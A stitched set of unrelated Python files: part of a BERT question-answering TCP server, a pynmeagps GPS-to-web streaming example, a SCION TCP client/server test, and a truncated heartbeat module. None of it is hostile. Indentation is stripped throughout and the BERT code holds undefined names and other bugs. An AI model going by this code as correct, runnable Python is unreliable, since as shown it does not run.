print('Score: %s' %fin_Score)
# ack message to Colab Client
#temp_answer = 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
Aten_result3_list.clear()
return ans_list, text_list
#return 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
'''
print('-'*5)
if excel_Answer_count == excel_count+1 :
print('-'*15)
print('\n')
if excel_Answer_count == excel_count :
ws['C' + str(excel_index)] = excel_Answer_count
ws['D' + str(excel_index)] = excel_NOtGoodAns_count
ws['F' + str(excel_index)] = excel_Intent_count
excel_index = excel_index+1
excel_Answer_count = const_AtenQuest_index[excel_index-1]
excel_NOtGoodAns_count = excel_NOtGoodAns_index[excel_index-1]
excel_Intent_count = const_AtenIntent_index[excel_index-1]
excel_count = 0
if excel_index <= len(const_AtenQuest_index) :
# print('Set my fin_Score with excel: %s' %fin_Score)
index_str = chr(73+excel_count) + str(excel_index)
ws[index_str] = fin_Score
excel_count = excel_count + 1
ws['A60'] = 'All'
ws['A61'] = '40QA'
ws['B59'] = 'Right answer'
ws['B60'] = '=SUM(B1:B40)+SUM(A41:A58)'
ws['B61'] = '=SUM(B1:B40)'
ws['C59'] = 'All answer'
ws['C60'] = '=SUM(C1:C58)-SUM(D1:D40)'
ws['C61'] = '=SUM(C1:C40)-SUM(D1:D40)'
ws['E59'] = 'Right Intent'
ws['E60'] = '=SUM(E1:E40)+SUM(A41:A58)'
ws['E61'] = '=SUM(E1:E40)'
ws['F59'] = 'All intent'
ws['F60'] = '=SUM(F1:F40)+SUM(C41:C58)'
ws['F61'] = '=SUM(F1:F40)'
ws['G59'] = 'answer prob'
ws['G60'] = '=B60/C60'
ws['G61'] = '=B61/C61'
ws['H59'] = 'Intent prob'
ws['H60'] = '=E60/F60'
ws['H61'] = '=E61/F61'
wb.save(FLAGS.excel_name + '.xlsx')
print('\n')
with tf.gfile.GFile(output_Aten_predict_file, "w") as writer:
writer.write(json.dumps(Aten_result3_list, indent=4,cls=DecimalEncoder) + "\n")
with tf.gfile.GFile(output_prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with tf.gfile.GFile(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if FLAGS.version_2_with_negative:
with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
'''
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heruistic between
# `pred_text` and `orig_text` to get a character-to-charcter alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, filename, is_training):
self.filename = filename
self.is_training = is_training
self.num_features = 0
#self._writer = tf.python_io.TFRecordWriter(filename)
self._writer = tf.io.TFRecordWriter(filename)
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
self.num_features += 1
def create_int_feature(values):
feature = tf.train.Feature(
int64_list=tf.train.Int64List(value=list(values)))
return feature
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
if self.is_training:
features["start_positions"] = create_int_feature([feature.start_position])
features["end_positions"] = create_int_feature([feature.end_position])
impossible = 0
if feature.is_impossible:
impossible = 1
features["is_impossible"] = create_int_feature([impossible])
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
#print("tf_example:")
#print(tf_example)
self._writer.write(tf_example.SerializeToString())
def close(self):
self._writer.close()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
# Retriever - added by Willy
if FLAGS.do_retriever:
if not FLAGS.retriever_model:
raise ValueError("You have to set retriever model(give the path) when you set do_retriever to Yes.")
if FLAGS.document_type != 'Sqlite' or FLAGS.db_file == None :
raise ValueError("You have to set document_type to Sqlit and set the db_file when you set do_retriever to Yes.")
# TODO : think a mechanism to chek these key word
'''
if FLAGS.document_type is 'SQlite':
# TODO: set database
elif FLAGS.document_type is 'Text':
# TODO: set text file
elif FLAGS.document_type is 'SQuAD':
# is original method
else :
raise ValueError(
"You have to set correct document_type: (1)'SQlite' (2)'Text' (3)SQuAD.")
'''
def read_squad_documents(input_file):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
documents = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
documents.append(paragraph["context"])
return documents
def read_sqlite_documents(input_file):
# TODO
db_class = retriever.get_class('sqlite')
with db_class(input_file) as doc_db:
doc_ids = doc_db.get_doc_ids()
for ids in doc_ids:
documents.append(doc_db.get_doc_text(ids))
doc_db.close()
DOC2IDX = {doc_id: i for i, doc_id in enumerate(doc_ids)}
return DOC2IDX, documents
def read_text_documents(input_file):
examples = []
file = open(input_file, "r")
documents = file.read()
file.close()
documents_split = documents.split('\n')
documents_final = list(filter(None, documents))
return documents_final
def read_squad_question(input_file):
questions = []
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
questions.append(qa["question"])
return questions
def set_eval_examples(questions, DOC2IDX):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
eval_examples = []
temp_list = []
for i, DOCID in enumerate(DOC2IDX) :
temp_list.append(DOCID)
for question in questions:
#-------------------------questions - Start---------------------------#
question_text = question
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
#-------------documents - Start--------------#
for i , paragraph_text in enumerate(documents):
paragraph_text = paragraph_text
#-------paragraphs - Start-------#
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
#-------paragraphs - End-------#
qas_id = str(uuid.uuid1())
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_id = temp_list[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
eval_examples.append(example)
#-------------documents - Start--------------#
#-------------------------questions - End-----------------------------#
if example_in_set_eval_examples == 1:
print('len of eval_examples:%d' %len(eval_examples))
for i, example in enumerate(eval_examples):
print(i)
print (example.question_text)
'''
for i, example in enumerate(eval_examples):
print('idx:%d:%s' %(i,example.question_text))
'''
return eval_examples
from socket import *
import sys
import threading
import time
from time import localtime
import imp
BUFSIZ = 4096
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self,tokenizer,estimator,DOC2IDX):
self.HOST = FLAGS.Host_TCPServer
self.PORT = FLAGS.PORT_TCPServer
self.tokenizer = tokenizer
self.estimator = estimator
self.ADDR = (self.HOST,self.PORT)
self.DOC2IDX = DOC2IDX
self.STOP_CHAT = False
self.STOP_listen = False
self.predict_input_fn = None
try:
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' %self.PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
# 设置退出条件
# 所有监听的客户端
self.clients = {}
self.thrs = {}
self.stops = []
print("before init predict_input_fn")
export_dir = FLAGS.EXPORT_PATH
subdirs = [x for x in Path(export_dir).iterdir()
if x.is_dir() and 'temp' not in str(x)]
print(subdirs)
latest = str(sorted(subdirs)[-1])
print("init predict_input_fn step1")
self.predict_input_fn = tf.contrib.predictor.from_saved_model(latest)
print("init predict_input_fn finish")
#self.predict_input_fn = tf.contrib.predictor.from_saved_model(FLAGS.EXPORT_PATH)
except Exception as e:
print("%d has some init error" %self.PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
print(u'等待接入,侦听端口:%d' %self.PORT)
self.tcpClientSock, self.addr = self.sock.accept()
print(u'接受连接,客户端地址:', self.addr)
while len(self.stops)!=0:
address_stop = self.stops.pop()
self.thrs[address_stop].join()
address = self.addr
# 将建立的client socket链接放到列表self.clients中
self.clients[address] = self.tcpClientSock
# 分别将每个建立的链接放入进程中,接收且分发消息
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
self.close_all()
print(u'系統結束')
def readmsg(self, address):
# 如果地址不存在,则返回False
if address not in self.clients:
return False
# 得到发送消息的client socket
client = self.clients[address]
while True:
try:
# 获取到消息内容data
data = client.recv(BUFSIZ)
except:
print(error)
self.close_client(address)
break
try:
temp = data.decode('utf8')
except:
print('data is not utf8 :%s' %(str(data)) )
self.close_client(address)
break
# python3使用bytes,所以要进行编码
# s='%s发送给我的信息是:[%s] %s' %(addr[0],ctime(), data.decode('utf8'))
# 对日期进行一下格式化
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
if len(data)<3:
if self.STOP_CHAT:
break
print('data is not reasonable:')
print(data)
self.close_client(address)
break
else:
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
elif data.decode('utf8') == Disconnect_KEYWORD:
print("disconnect")
self.close_client(address)
break
#tokenizer = self.tokenizer
#estimator = self.estimator
#DOC2IDX = self.DOC2IDX
question = data.decode('utf8')
#print('My question:',question)
if FLAGS.do_predict:
# define
#---------------------------------------------------
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
# ---------------------------------------------------
# print('WillyTest(1)...do Set question:%s' %(FLAGS.question_type))
# ---------------------set question , changed by willy---------------------#
questions = list()
questions.append(question)
#print('My questions:')
#print(questions)
#-------------------------------------------------------------------------#
#print('WillyTest(2)...do Set eval_examples')
eval_examples=set_eval_examples(questions,self.DOC2IDX)
#print('WillyTest(2.1)...do
')
eval_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "eval.tf_record"),
is_training=False
)
#print('WillyTest(2.2)...do convert_examples_to_features')
convert_examples_to_features(
examples=eval_examples,
tokenizer=self.tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature
)
eval_writer.close()
tf.compat.v1.logging.info("***** Running predictions *****")
tf.compat.v1.logging.info(" Num orig examples = %d", len(eval_examples))
tf.compat.v1.logging.info(" Num split examples = %d", len(eval_features))
tf.compat.v1.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
print('WillyTest(5)...before redict_input_fn = input_fn_builder: eval_writer.filename=%s, FLAGS.max_seq_length=%d' %(eval_writer.filename,FLAGS.max_seq_length))
feature_spec = {
"unique_ids": np.asarray(eval_features[0].unique_id).tolist(),
"input_ids": np.asarray(eval_features[0].input_ids).tolist(),
"input_mask": np.asarray(eval_features[0].input_mask).tolist(),
"segment_ids": np.asarray(eval_features[0].segment_ids).tolist()
}
print('content with feature_spec.unique_id:')
print(feature_spec)
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string,
shape=[1],
name='input_example_tensor'
)
print("Do serialized_tf_example finish")
receiver_tensors = {'examples': serialized_tf_example}
print("Before do parse_example ")
features = tf.io.parse_example(serialized_tf_example, feature_spec)
print("Do features finish")
print(features)
inputs = collections.OrderedDict()
inputs["input_ids"] = create_int_feature(features[0].input_ids)
inputs["input_mask"] = create_int_feature(features[0].input_mask)
inputs["segment_ids"] = create_int_feature(features[0].segment_ids)
inputs["unique_ids"] = create_int_feature([features[0].unique_id])
print("Do input finish")
print(inputs)
print("Before do train")
tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
print("Before do predict")
out = predict_fn({'examples':[tf_example.SerializeToString()]})
print("Finish do predict")
#out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
features = eval_features
inputs = collections.OrderedDict()
inputs["input_ids"] = create_int_feature(features[0].input_ids)
inputs["input_mask"] = create_int_feature(features[0].input_mask)
inputs["segment_ids"] = create_int_feature(features[0].segment_ids)
inputs["unique_ids"] = create_int_feature([features[0].unique_id])
tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
print('Output Data:')
print(out)
'''
'''
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False
)
all_results = []
print('WillyTest(6)...before estimator predict')
for result in self.estimator.predict(predict_input_fn, yield_single_examples=True):
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
print('WillyTest(8)...before write_predictions')
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
temp_answer = ''
if len(list_ans)==1 and len(list_text)==1:
temp_answer = 'Dr_Answer' + list_ans[0] + 'Dr_QA' + list_text[0] + '<AtenEnd>'
client.send(temp_answer.encode('utf8'))
else:
print("Willy warning: write_predictions is not valid....")
print('list_ans')
print(list_ans)
print('list_text')
print(list_text)
#clear list
eval_features.clear()
eval_examples.clear()
all_results.clear()
questions.clear()
'''
def close_all(self):
try:
keys=self.clients.keys()
for address in keys:
client = self.clients.pop(address)
client.close()
time.sleep(1)
thr = self.thrs[address].pop()
thr.join()
except:
print(u'try fault')
pass
print(u'all client 已经退出')
def close_client(self, address):
try:
client = self.clients.pop(address)
self.stops.append(address)
print(u'try close client')
client.close()
print(u'try close recv thres')
#thr = self.thrs[address].pop()
#thr.join()
'''
for k in self.clients:
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
except:
print(u'try fault')
pass
print(str(address) + u'已经退出')
def main(_):
global ranker
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
print(willy_check_code)
print('Bert config: %s' %(FLAGS.bert_config_file))
#FLAGS.bert_config_file = 'gs://bert_willytest/bert/models/20190910-wwm-cased-40QA-SQuAD2-AtenDocQA-withoutYesNo-max_seq_length-256-doc_stride-128-learning_rate-3e-5/bert_config.json'
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.io.gfile.makedirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
print('Init checkpoint: %s' %FLAGS.init_checkpoint )
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
if FLAGS.do_retriever:
# Set Document
# ------------------------------------------------------
print('WillyTest...do SQlite')
DOC2IDX, docments = read_sqlite_documents(input_file=FLAGS.db_file)
# ------------------------------------------------------
else:
# Set Document
tf.compat.v1.logging.info("my document_type is %s", FLAGS.document_type)
if FLAGS.document_type is 'Text':
# TODO
print('WillyTest...do Text')
docments = read_text_documents(input_file=FLAGS.predict_file)
elif FLAGS.document_type is 'SQuAD':
# TODO
print('WillyTest...do SQuAD')
docments = read_squad_documents(input_file=FLAGS.predict_file)
# else:
# #raise ValueError("Your document_type: %s is undefined or wrong, please reset it." %(FLAGS.document_type))
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
if FLAGS.Save_PB_Model == True:
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
else:
print("do tcp server")
ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
tserver = None
tserver = TcpServer(tokenizer,estimator,DOC2IDX)
while tserver == None:
tserver = TcpServer( tokenizer,estimator,DOC2IDX)
print("do tcp server-listen")
tserver.listen_client()
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.compat.v1.app.run()
|
gpsstreamer.py
|
"""
This illustrates a simple HTTP wrapper around the
pynmneagps NMEAStreamer streaming and parsing example.
It displays selected GPS data on a dynamically updated web page
using the native Python 3 http.server library and a RESTful API
implemented by the pynmeagps streaming and parsing service.
NB: Must be executed from the root folder i.e. /examples/webserver/.
Press CTRL-C to terminate.
The web page can be accessed at http://localhost:8080. The parsed
data can also be accessed directly via the REST API http://localhost:8080/gps.
Created on 17 May 2021
:author: semuadmin
:license: (c) SEMU Consulting 2021 - BSD 3-Clause License
"""
from io import BufferedReader
from threading import Thread
from time import sleep
import json
from gpshttpserver import GPSHTTPServer, GPSHTTPHandler
from serial import Serial, SerialException, SerialTimeoutException
from pynmeagps import NMEAReader, GET
import pynmeagps.exceptions as nme
class NMEAStreamer:
"""
NMEAStreamer class.
"""
def __init__(self, port, baudrate, timeout=0.1, nmea_only=0, validate=1):
"""
Constructor.
"""
self._serial_object = None
self._serial_thread = None
self._nmeareader = None
self._connected = False
self._reading = False
self._port = port
self._baudrate = baudrate
self._timeout = timeout
self._nmea_only = nmea_only
self._validate = validate
self.gpsdata = {
"date": "1900-01-01",
"time": "00.00.00",
"latitude": 0.0,
"longitude": 0.0,
"elevation": 0.0,
"speed": 0.0,
"track": 0.0,
"siv": 0,
"pdop": 99,
"hdop": 99,
"vdop": 99,
"fix": 0,
}
def __del__(self):
"""
Destructor.
"""
self.stop_read_thread()
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
self._connected = False
try:
print(f"Connecting to serial port {self._port} at {self._baudrate} baud...")
self._serial_object = Serial(
self._port, self._baudrate, timeout=self._timeout
)
self._nmeareader = NMEAReader(
BufferedReader(self._serial_object),
nmeaonly=self._nmea_only,
validate=self._validate,
msgmode=GET,
)
self._connected = True
except (SerialException, SerialTimeoutException) as err:
print(f"Error connecting to serial port {err}")
return self._connected
def disconnect(self):
"""
Close serial connection.
"""
if self._connected and self._serial_object:
print("Disconnecting from serial port...")
try:
self._serial_object.close()
except (SerialException, SerialTimeoutException) as err:
print(f"Error disconnecting from serial port {err}")
self._connected = False
return self._connected
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
print("\nStarting reader thread...")
self._reading = True
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def stop_read_thread(self):
"""
Stop the serial reader thread.
"""
if self._serial_thread is not None:
print("\nStopping web server thread...")
self._reading = False
def _read_thread(self):
"""
THREADED PROCESS
Reads and parses NMEA message data from stream
"""
while self._reading and self._serial_object:
if self._serial_object.in_waiting:
try:
(raw_data, parsed_data) = self._nmeareader.read()
if parsed_data:
self.set_data(parsed_data)
except (
nme.NMEAStreamError,
nme.NMEAMessageError,
nme.NMEATypeError,
nme.NMEAParseError,
) as err:
print(f"Something went wrong {err}")
continue
def set_data(self, parsed_data):
"""
Set GPS data dictionary from RMC, GGA and GSA sentences.
"""
print(parsed_data)
if parsed_data.msgID == "RMC":
self.gpsdata["date"] = str(parsed_data.date)
self.gpsdata["time"] = str(parsed_data.time)
self.gpsdata["latitude"] = parsed_data.lat
self.gpsdata["longitude"] = parsed_data.lon
self.gpsdata["speed"] = parsed_data.spd
self.gpsdata["track"] = parsed_data.cog
if parsed_data.msgID == "GGA":
self.gpsdata["time"] = str(parsed_data.time)
self.gpsdata["latitude"] = parsed_data.lat
self.gpsdata["longitude"] = parsed_data.lon
self.gpsdata["elevation"] = parsed_data.alt
self.gpsdata["siv"] = parsed_data.numSV
self.gpsdata["hdop"] = parsed_data.HDOP
if parsed_data.msgID == "GSA":
self.gpsdata["fix"] = parsed_data.navMode
self.gpsdata["pdop"] = parsed_data.PDOP
self.gpsdata["hdop"] = parsed_data.HDOP
self.gpsdata["vdop"] = parsed_data.VDOP
def get_data(self):
"""
Return GPS data in JSON format.
This is used by the REST API /gps implemented in the
GPSHTTPServer class.
"""
return json.dumps(self.gpsdata)
if __name__ == "__main__":
ADDRESS = "localhost"
TCPPORT = 8080
# Edit these for your serial GPS device:
SERIALPORT = "/dev/tty.usbmodem141101" # "/dev/ttyACM1"
BAUD = 38400
gps = NMEAStreamer(SERIALPORT, BAUD)
httpd = GPSHTTPServer((ADDRESS, TCPPORT), GPSHTTPHandler, gps)
if gps.connect():
gps.start_read_thread()
print(
"\nStarting HTTP Server on http://"
+ ADDRESS
+ ":"
+ str(TCPPORT)
+ " ...\n"
)
httpd_thread = Thread(target=httpd.serve_forever, daemon=True)
httpd_thread.start()
try:
while True:
pass
except KeyboardInterrupt:
print("\n\nInterrupted by user\n\n")
httpd.shutdown()
gps.stop_read_thread()
sleep(2) # wait for shutdown
gps.disconnect()
print("\nTest Complete")
|
tcp_test.py
|
#!/usr/bin/python3
# Copyright 2016 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`tcp_test` --- Dummy TCP Client/Server test.
=================================================
"""
# TODO(PSz): drop this test when TCP is integrated within the end2end test.
# Stdlib
import random
import struct
import threading
import time
# SCION
from lib.packet.host_addr import haddr_parse
from lib.packet.scion_addr import ISD_AS, SCIONAddr
from lib.packet.svc import SVCType
from lib.tcp.socket import SCIONTCPSocket, SockOpt
from lib.util import recv_all
from test.integration.base_cli_srv import start_sciond
s_isd_as = ISD_AS("1-18")
s_ip = haddr_parse(1, "127.1.1.1")
c_isd_as = ISD_AS("2-26")
c_ip = haddr_parse(1, "127.2.2.2")
# TODO(PSz): test with 0
MAX_MSG_SIZE = 500000
def get_msg():
size = random.randint(1, MAX_MSG_SIZE)
return struct.pack("!I", size) + b"A"*size
def server(svc=False):
print("server running")
s = SCIONTCPSocket()
print('setsockopt')
s.setsockopt(SockOpt.SOF_REUSEADDR)
print(s.getsockopt(SockOpt.SOF_REUSEADDR))
addr = SCIONAddr.from_values(s_isd_as, s_ip)
if svc:
s.bind((addr, 6000), svc=SVCType.PS_A)
else:
s.bind((addr, 5000))
s.listen()
while True:
new_sock, addr, path = s.accept()
print("Accepted: addr and path:", addr, path)
msg = get_msg()
# time.sleep(10)
new_sock.send(msg)
new_sock.close()
def client(svc, counter):
def get_path_info(myaddr, dst_isd_as):
sd = start_sciond(myaddr)
path = sd.get_paths(dst_isd_as)[0]
if_id = path.get_fwd_if()
return (path, sd.ifid2br[if_id].addr, sd.ifid2br[if_id].port)
print("client %d running:" % counter)
s = SCIONTCPSocket()
caddr = SCIONAddr.from_values(c_isd_as, c_ip)
s.bind((caddr, 0))
path_info = get_path_info(caddr, s_isd_as)
print(path_info)
if svc:
saddr = SCIONAddr.from_values(s_isd_as, SVCType.PS_A)
s.connect(saddr, 0, *path_info) # SVC does not have a port specified
else:
saddr = SCIONAddr.from_values(s_isd_as, s_ip)
s.connect(saddr, 5000, *path_info)
# s.set_recv_tout(5.0)
# print(s.get_recv_tout())
start = time.time()
size = struct.unpack("!I", recv_all(s, 4, 0))[0]
tmp = b''
print("To receive: %dB" % size)
while len(tmp) != size:
tmp += s.recv(1024)
print('.', end="", flush=True)
print("\nMSG received, len, svc", len(tmp), svc)
time_elapsed = time.time()-start
print("Time elapsed: %s, speed %.2fkB/s\n" % (time_elapsed,
size/time_elapsed/1000))
s.close()
threading.Thread(target=server, args=[False]).start()
threading.Thread(target=server, args=[True]).start()
time.sleep(0.5)
for i in range(10):
# input()
# time.sleep(0.005)
# threading.Thread(target=client, args=[False, i]).start()
svc = (i % 2 == 0)
start = time.time()
client(svc, i)
|
heartbeat.py
|
import asyncio
import time
import threading
class HeartBeat:
def __init__(self, rust_api) -> None:
self.rust_api = rust_api
self.next_run = time.time()
self.running = False
async def start_beat(self) -> None:
if self.running:
return
def wrapper(self, loop) -> None:
async def heart_beat(self) -> None:
